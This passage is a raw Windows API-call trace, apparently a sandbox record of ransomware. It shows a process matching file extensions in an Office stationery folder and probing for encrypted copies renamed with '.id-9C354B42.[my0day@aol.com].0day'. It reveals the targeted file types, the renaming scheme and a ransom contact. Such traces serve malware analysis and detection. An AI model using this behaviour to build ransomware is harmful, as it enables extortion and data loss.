[0041.609] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.609] lstrlenW (lpString=".zip") returned 4 [0041.609] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.609] lstrlenW (lpString=".rar") returned 4 [0041.609] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.609] lstrlenW (lpString=".bz2") returned 4 [0041.609] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.609] lstrlenW (lpString=".7z") returned 3 [0041.609] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.609] lstrlenW (lpString=".dbf") returned 4 [0041.609] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.609] lstrlenW (lpString=".1cd") returned 4 [0041.609] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.609] lstrlenW (lpString=".jpg") returned 4 [0041.609] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.609] lstrcmpiW (lpString1=".htm", lpString2=".0day") returned 1 [0041.609] lstrlenW (lpString="Bears.htm") returned 9 [0041.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0041.611] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=255) returned 1 [0041.611] CloseHandle (hObject=0x200) returned 1 [0041.611] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm")) returned 0x20 [0041.611] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.611] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.611] lstrlenW (lpString=".doc") returned 4 [0041.611] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0041.612] lstrlenW (lpString=".docx") returned 5 [0041.612] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0041.612] lstrlenW (lpString=".pdf") returned 4 [0041.612] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0041.612] lstrlenW (lpString=".xls") returned 4 [0041.612] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0041.612] lstrlenW (lpString=".xlsx") returned 5 [0041.612] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0041.612] lstrlenW (lpString=".ppt") returned 4 [0041.612] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0041.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.612] lstrlenW (lpString=".zip") returned 4 [0041.612] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0041.612] lstrlenW (lpString=".rar") returned 4 [0041.612] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0041.612] lstrlenW (lpString=".bz2") returned 4 [0041.612] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0041.612] lstrlenW (lpString=".7z") returned 3 [0041.612] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0041.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.612] lstrlenW (lpString=".dbf") returned 4 [0041.612] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0041.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.612] lstrlenW (lpString=".1cd") returned 4 [0041.612] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0041.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.612] lstrlenW (lpString=".jpg") returned 4 [0041.612] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0041.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.612] lstrlenW (lpString=".doc") returned 4 [0041.612] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0041.613] lstrlenW (lpString=".docx") returned 5 [0041.613] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0041.613] lstrlenW (lpString=".pdf") returned 4 [0041.613] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0041.613] lstrlenW (lpString=".xls") returned 4 [0041.613] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0041.613] lstrlenW (lpString=".xlsx") returned 5 [0041.613] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0041.613] lstrlenW (lpString=".ppt") returned 4 [0041.613] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0041.613] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.613] lstrlenW (lpString=".zip") returned 4 [0041.613] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0041.613] lstrlenW (lpString=".rar") returned 4 [0041.613] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0041.613] lstrlenW (lpString=".bz2") returned 4 [0041.613] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0041.613] lstrlenW (lpString=".7z") returned 3 [0041.613] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0041.613] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.613] lstrlenW (lpString=".dbf") returned 4 [0041.613] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0041.613] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.613] lstrlenW (lpString=".1cd") returned 4 [0041.613] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0041.613] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.613] lstrlenW (lpString=".jpg") returned 4 [0041.613] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0041.613] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0041.613] lstrlenW (lpString="Bears.jpg") returned 9 [0041.614] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0041.614] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1074) returned 1 [0041.614] CloseHandle (hObject=0x200) returned 1 [0041.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg")) returned 0x20 [0041.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.614] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.614] lstrlenW (lpString=".doc") returned 4 [0041.614] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0041.614] lstrlenW (lpString=".docx") returned 5 [0041.614] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0041.614] lstrlenW (lpString=".pdf") returned 4 [0041.614] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0041.614] lstrlenW (lpString=".xls") returned 4 [0041.614] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0041.614] lstrlenW (lpString=".xlsx") returned 5 [0041.614] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0041.614] lstrlenW (lpString=".ppt") returned 4 [0041.614] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0041.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.615] lstrlenW (lpString=".zip") returned 4 [0041.615] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0041.615] lstrlenW (lpString=".rar") returned 4 [0041.615] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0041.615] lstrlenW (lpString=".bz2") returned 4 [0041.615] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0041.615] lstrlenW (lpString=".7z") returned 3 [0041.615] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0041.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.615] lstrlenW (lpString=".dbf") returned 4 [0041.615] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0041.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.615] lstrlenW (lpString=".1cd") returned 4 [0041.615] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0041.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.615] lstrlenW (lpString=".jpg") returned 4 [0041.615] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0041.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.615] lstrlenW (lpString=".doc") returned 4 [0041.615] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0041.615] lstrlenW (lpString=".docx") returned 5 [0041.615] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0041.615] lstrlenW (lpString=".pdf") returned 4 [0041.615] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0041.615] lstrlenW (lpString=".xls") returned 4 [0041.615] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0041.615] lstrlenW (lpString=".xlsx") returned 5 [0041.615] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0041.615] lstrlenW (lpString=".ppt") returned 4 [0041.615] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0041.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.616] lstrlenW (lpString=".zip") returned 4 [0041.616] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0041.616] lstrlenW (lpString=".rar") returned 4 [0041.616] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0041.616] lstrlenW (lpString=".bz2") returned 4 [0041.616] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0041.616] lstrlenW (lpString=".7z") returned 3 [0041.616] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0041.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.616] lstrlenW (lpString=".dbf") returned 4 [0041.616] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0041.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.616] lstrlenW (lpString=".1cd") returned 4 [0041.616] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0041.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.616] lstrlenW (lpString=".jpg") returned 4 [0041.616] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0041.616] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0041.616] lstrlenW (lpString="Blue_Gradient.jpg") returned 17 [0041.616] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0041.617] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=2575) returned 1 [0041.617] CloseHandle (hObject=0x200) returned 1 [0041.617] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg")) returned 0x20 [0041.617] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.617] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.617] lstrlenW (lpString=".doc") returned 4 [0041.618] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0041.618] lstrlenW (lpString=".docx") returned 5 [0041.618] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0041.618] lstrlenW (lpString=".pdf") returned 4 [0041.618] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0041.618] lstrlenW (lpString=".xls") returned 4 [0041.618] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0041.618] lstrlenW (lpString=".xlsx") returned 5 [0041.618] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0041.618] lstrlenW (lpString=".ppt") returned 4 [0041.618] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0041.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.618] lstrlenW (lpString=".zip") returned 4 [0041.618] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0041.618] lstrlenW (lpString=".rar") returned 4 [0041.618] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0041.618] lstrlenW (lpString=".bz2") returned 4 [0041.618] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0041.618] lstrlenW (lpString=".7z") returned 3 [0041.618] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0041.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.618] lstrlenW (lpString=".dbf") returned 4 [0041.618] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0041.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.618] lstrlenW (lpString=".1cd") returned 4 [0041.618] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0041.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.618] lstrlenW (lpString=".jpg") returned 4 [0041.618] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0041.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.618] lstrlenW (lpString=".doc") returned 4 [0041.618] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0041.619] lstrlenW (lpString=".docx") returned 5 [0041.619] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0041.619] lstrlenW (lpString=".pdf") returned 4 [0041.619] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0041.619] lstrlenW (lpString=".xls") returned 4 [0041.619] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0041.619] lstrlenW (lpString=".xlsx") returned 5 [0041.619] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0041.619] lstrlenW (lpString=".ppt") returned 4 [0041.619] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0041.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.619] lstrlenW (lpString=".zip") returned 4 [0041.619] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0041.619] lstrlenW (lpString=".rar") returned 4 [0041.619] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0041.619] lstrlenW (lpString=".bz2") returned 4 [0041.619] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0041.619] lstrlenW (lpString=".7z") returned 3 [0041.619] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0041.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.619] lstrlenW (lpString=".dbf") returned 4 [0041.619] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0041.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.619] lstrlenW (lpString=".1cd") returned 4 [0041.619] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0041.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.620] lstrlenW (lpString=".jpg") returned 4 [0041.620] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0041.620] lstrcmpiW (lpString1=".gif", lpString2=".0day") returned 1 [0041.620] lstrlenW (lpString="Cave_Drawings.gif") returned 17 [0041.620] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0041.620] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=4587) returned 1 [0041.620] CloseHandle (hObject=0x200) returned 1 [0041.620] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif")) returned 0x20 [0041.620] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.620] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.620] lstrlenW (lpString=".doc") returned 4 [0041.620] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0041.620] lstrlenW (lpString=".docx") returned 5 [0041.621] lstrcmpiW (lpString1=".docx", lpString2="s.gif") returned -1 [0041.621] lstrlenW (lpString=".pdf") returned 4 [0041.621] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0041.621] lstrlenW (lpString=".xls") returned 4 [0041.621] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0041.621] lstrlenW (lpString=".xlsx") returned 5 [0041.621] lstrcmpiW (lpString1=".xlsx", lpString2="s.gif") returned -1 [0041.621] lstrlenW (lpString=".ppt") returned 4 [0041.621] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0041.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.621] lstrlenW (lpString=".zip") returned 4 [0041.621] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0041.621] lstrlenW (lpString=".rar") returned 4 [0041.621] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0041.621] lstrlenW (lpString=".bz2") returned 4 [0041.621] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0041.621] lstrlenW (lpString=".7z") returned 3 [0041.621] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0041.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.621] lstrlenW (lpString=".dbf") returned 4 [0041.621] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0041.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.621] lstrlenW (lpString=".1cd") returned 4 [0041.621] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0041.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.621] lstrlenW (lpString=".jpg") returned 4 [0041.621] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0041.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.621] lstrlenW (lpString=".doc") returned 4 [0041.621] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0041.621] lstrlenW (lpString=".docx") returned 5 [0041.621] lstrcmpiW (lpString1=".docx", lpString2="s.gif") returned -1 [0041.621] lstrlenW (lpString=".pdf") returned 4 [0041.622] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0041.622] lstrlenW (lpString=".xls") returned 4 [0041.622] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0041.622] lstrlenW (lpString=".xlsx") returned 5 [0041.622] lstrcmpiW (lpString1=".xlsx", lpString2="s.gif") returned -1 [0041.622] lstrlenW (lpString=".ppt") returned 4 [0041.622] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0041.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.622] lstrlenW (lpString=".zip") returned 4 [0041.622] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0041.622] lstrlenW (lpString=".rar") returned 4 [0041.622] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0041.622] lstrlenW (lpString=".bz2") returned 4 [0041.622] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0041.622] lstrlenW (lpString=".7z") returned 3 [0041.622] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0041.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.622] lstrlenW (lpString=".dbf") returned 4 [0041.622] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0041.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.622] lstrlenW (lpString=".1cd") returned 4 [0041.622] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0041.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.622] lstrlenW (lpString=".jpg") returned 4 [0041.622] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0041.622] lstrcmpiW (lpString1=".gif", lpString2=".0day") returned 1 [0041.622] lstrlenW (lpString="Connectivity.gif") returned 16 [0041.622] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0041.623] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=2319) returned 1 [0041.623] CloseHandle (hObject=0x200) returned 1 [0041.623] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif")) returned 0x20 [0041.623] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.623] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.623] lstrlenW 